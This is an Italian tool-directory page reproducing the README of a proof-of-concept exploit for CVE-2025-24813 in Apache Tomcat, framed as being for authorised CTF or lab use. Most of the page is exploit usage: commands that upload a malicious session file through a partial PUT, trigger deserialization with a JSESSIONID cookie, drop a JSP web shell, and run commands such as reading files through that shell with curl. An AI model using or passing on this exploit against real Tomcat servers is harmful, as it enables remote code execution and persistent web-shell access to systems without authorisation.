Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24813 — payload giusto per CVE Java | Kitploit
Strumenti/GitHubGitHub/loufa0/cve-2025-24813
Scanner di VulnerabilitàExploitSicurezza WebCTFApprendimento e FormazioneLab e Pratica
GitHubloufa0/cve-2025-24813

CVE-2025-24813

payload giusto per CVE Java

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24813 Tomcat PoC

PoC per un ambiente CTF/lab autorizzato. Sfrutta CVE-2025-24813 tramite la scrittura PUT parziale di un file di sessione Tomcat, quindi innesca la deserializzazione con JSESSIONID.

Prerequisiti

  • Python 3
  • Modulo Python requests
  • Java JDK (java e javac)
  • Il file incluso commons-collections-3.2.1.jar, posizionato in questa cartella

ysoserial non è richiesto.

File

  • poc_cve_2025_24813.py: wrapper Python che automatizza generazione, upload e trigger.
  • GenerateTomcatSessionPayload.java: genera una sessione Tomcat valida contenente un gadget CommonsCollections.
  • commons-collections-3.2.1.jar: dipendenza del gadget.
  • sh.jsp: JSP shell opzionale distribuito da --drop-shell.

Utilizzo

Distribuire una JSP shell nella webroot predefinita /opt/tomcat/webapps/ROOT:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

Eseguire un comando diretto senza distribuire una shell:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

Se la webroot è diversa:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

Se il JAR viene spostato, indicarne il percorso:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

Dopo lo sfruttamento

Se --drop-shell riesce:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

Condizioni sul lato target

  • Versione Tomcat vulnerabile.
  • DefaultServlet scrivibile, tipicamente readonly=false.
  • Supporto del partial PUT.
  • Sessioni persistenti tramite PersistentManager e FileStore.
  • Gadget chain disponibile lato server, qui commons-collections.

Il comportamento atteso durante l'upload è spesso HTTP 409 Conflict su:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

Quindi la deserializzazione viene innescata con:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
Scarica lo strumento